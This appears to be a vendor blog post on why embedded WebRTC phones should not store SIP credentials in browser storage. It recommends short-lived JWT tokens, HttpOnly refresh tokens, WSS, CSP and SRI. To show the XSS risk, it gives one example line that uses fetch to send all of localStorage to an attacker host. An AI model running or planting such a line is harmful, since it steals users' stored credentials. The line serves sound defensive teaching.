,

Why your embedded web phone should never store SIP credentials in the browser

Justin Avatar

·

,

·

Glowing key dissolving into particles in front of a browser window displaying code, representing SIP credentials being exposed in the browser


When you embed a WebRTC phone into a web application, you eventually have to decide where the SIP credentials live. The user needs to authenticate with a SIP server. The phone needs those credentials to register. At some point, someone asks: can we just put them in localStorage?

The answer is no. This article explains why, and what to do instead.

What SIP credentials actually represent

A SIP username and password is not just a login for a phone call — it is the key to a registered extension on a PBX. With those credentials, someone can register your extension from anywhere in the world, make outbound calls billed to your account, intercept your inbound calls, and in many Asterisk or FreeSWITCH environments, use your extension as a foothold to probe others on the same system.

SIP fraud via stolen credentials is not a theoretical concern. It costs the telecoms industry hundreds of millions of dollars annually and happens routinely to systems where credentials were handled carelessly.

Why the browser is a poor place to store secrets

localStorage persists across sessions and is readable by any JavaScript running on the same origin. If your application has a single XSS vulnerability — in your own code, in a dependency, or in a third-party script loaded on the same page — everything in localStorage can be exfiltrated in one line:

Copied!
fetch('https://attacker.com/steal?d=' + JSON.stringify(localStorage))

Cookies with the HttpOnly flag are not readable from JavaScript, which is an improvement, but they are sent automatically with every request to your domain and are therefore a target for CSRF attacks. Session storage avoids cross-tab persistence but is still fully accessible to any script running on the page.

The browser is an environment designed to run code from multiple sources. Treating it as a secure store for long-lived telephony credentials is the wrong mental model — a point the OWASP HTML5 Security Cheat Sheet makes explicitly with respect to session identifiers and other sensitive data.

The correct approach: short-lived tokens

The right pattern is to never send the SIP password to the browser at all. Instead:

  • The user authenticates to your application through your normal login flow
  • Your server generates a short-lived token scoped to that user’s SIP identity
  • The browser presents the token to the SIP gateway
  • The gateway registers the SIP extension on the user’s behalf — the actual password never leaves the server
  • The token expires after a short window — minutes, not days

This is the same pattern used by Twilio (capability tokens), Vonage (JWT), and a properly architected browser phone. A stolen token has a limited useful life and is scoped to a single user’s identity. It is not the same as a stolen password.

JWT as a SIP auth token

JSON Web Tokens are a natural fit here. Your server signs a JWT containing the user’s SIP identity and an expiry:

Copied!
{ "sub": "user@yourdomain.com", "sip_identity": "1001@pbx.yourdomain.com", "exp": 1712180000, "iat": 1712176400 }

The exp claim is the important one. Set it to 15 to 60 minutes depending on your session model. The SIP gateway validates the JWT signature server-side and handles registration. The browser presents a token and makes calls. It never sees a SIP password.

SDKs that act as a WebRTC-to-SIP proxy are well suited to this kind of architecture, because the SIP credentials never need to reach the browser in the first place: the proxy holds them and the browser authenticates against the proxy with a short-lived, scoped credential. For developers integrating this pattern in production, the Siperb Web Phone for developers documentation covers the implementation detail.

Token refresh

The common objection to short-lived tokens is that they need a refresh mechanism. This is true, and it is not particularly complex — it is the same pattern used for API access tokens in most modern web applications.

  • Issue a short-lived access token (15 to 60 minutes) and a longer-lived refresh token (hours), with the refresh token stored HttpOnly in a cookie where JavaScript cannot reach it
  • When the access token approaches expiry, the SDK requests a new one from your server using the refresh token
  • Your server validates the refresh token, issues a new access token, and rotates the refresh token on each use

From the user’s perspective, their phone continues working without interruption. The credentials stay on the server throughout.

A note on WSS

Encrypting the signalling channel — using WSS rather than plain WebSocket — is necessary and you should be doing it regardless. But it is worth being clear about what it protects: credentials in transit. TLS does not protect credentials sitting in the browser’s storage. An XSS attack reads from the client directly and does not need to intercept network traffic.

Use WSS. And also do not store credentials in the browser. They address different threat vectors and neither is a substitute for the other.

A checklist before shipping

  • SIP password never transmitted to the browser
  • Short-lived JWT or capability token used for SIP authentication
  • Token expiry set to 60 minutes or less
  • Refresh token stored HttpOnly — not in localStorage or session storage
  • All signalling over WSS
  • Content Security Policy headers configured to restrict script execution to known origins
  • Subresource Integrity on any third-party scripts loaded on the same page as the phone

The last two are often skipped in telephony integrations. A well-configured CSP header meaningfully reduces the XSS attack surface. SRI ensures a compromised CDN cannot inject script into a page with an active phone session.

A well-designed browser phone keeps SIP credentials off the browser by default. If you are evaluating WebRTC phone SDKs, how credentials are handled is a reasonable thing to ask about — the answer tends to reveal a fair amount about how the product was designed.

Leave a Reply

Your email address will not be published. Required fields are marked *